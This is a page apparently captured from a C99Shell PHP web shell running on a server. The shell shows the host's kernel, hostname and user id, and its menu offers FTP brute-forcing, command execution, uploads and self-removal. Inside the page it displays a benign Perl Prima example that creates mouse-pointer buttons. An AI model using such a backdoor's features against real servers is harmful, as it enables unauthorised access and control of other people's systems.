!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/lib64/perl5/vendor_perl/Prima/examples/   drwxr-xr-x
Free 6181.71 GB of 6262.91 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pointers.pl (2.39 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
=pod

=head1 NAME

examples/pointers.pl - Prima mouse pointer example

=head1 FEATURES

Demonstrates the usage of Prima mouse pointer functionality.
Note the custom pointer creation and its dynamic change ( the "User" button ).

=cut

use strict;
use warnings;
use Prima qw( StdBitmap Buttons Application);

package UserInit;

my $ph = Prima::Application-> get_system_value(sv::YPointer);
my $sc = $::application-> uiScaling;
$ph = $::application->font->height * 2 if $ph < $::application->font->height * 2;
my $w = Prima::MainWindow-> create(
    size    => [ 350 * $sc, 20 + ($ph+8)*15],
    left    => 200,
    text    => 'Pointers',
);

my %grep_out = (
    'BEGIN' => 1,
    'END' => 1,
    'AUTOLOAD' => 1,
    'constant' => 1
);

my @a = sort { &{$cr::{$a}}() <=> &{$cr::{$b}}()} grep { !exists $grep_out{$_}} keys %cr::;
shift @a;
$::application-> pointerVisible(0);
my $i = 1;

for my $c ( @a[0..$#a-1])
{
    my $p = eval("cr::$c");
    $w-> pointer( $p);
    my $b = $w-> insert( Button =>
        flat => 1,
        left    => (10 + (($i-1) % 2)*170) * $sc,
        width   => 160 * $sc,
        height  => $ph + 4,
        bottom  => $w-> height - int(($i+1)/2) * ($ph+8) - 10,
        pointer => $p,
        name    => $c,
        image   => $w-> pointerIcon,
        onClick => sub { $::application-> pointer( $_[0]-> pointer); },
    );
    $i++;
};

my $ptr = Prima::StdBitmap::icon( sbmp::DriveCDROM, argb => 0, copy => 1);
my $color_pointer = $::application->get_system_value(sv::ColorPointer);

my @mapset = map {
    my ($x,$r) = $ptr-> split;
    my $j = Prima::Icon-> create;
    $x-> begin_paint;
    $x-> text_out( $_, 3, 3);
    $x-> end_paint;
    $r-> begin_paint;
    $r-> text_out( $_, 3, 3);
    $r-> end_paint;
    if ( $color_pointer ) { # add alpha
        $r-> type(im::Byte);
        $r-> rop2(rop::CopyPut);
        $r->color(0xc0c0c0);
        $r->backColor(0);
        $r->map(0);
    }
    $j-> combine( $x, $r);
    $j;
} 1..4;
my $mapsetID = 0;

my $b = $w-> insert( SpeedButton =>
    left    => $sc * ( 10 + (($i-1) % 2)*170 ),
    width   => 160 * $sc,
    height  => $ph+4,
    bottom  => $w-> height - int(($i+1)/2) * ($ph+8) - 10,
    pointer => $mapset[-1],
    image   => $mapset[-1],
    text => $a[-1],
    flat => 1,
    onClick => sub {
        $::application-> pointer( $_[0]-> pointer);
    },
);

$b-> insert( Timer =>
    timeout => 1250,
    onTick  => sub {
        $b-> pointerIcon( $mapset[$mapsetID]);
        $b-> image( $mapset[$mapsetID]);
        $mapsetID++;
        $mapsetID = 0 if $mapsetID >= @mapset;
    },
)-> start;

$w-> pointer( cr::Default);
$::application-> pointerVisible(1);

run Prima;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0224 ]--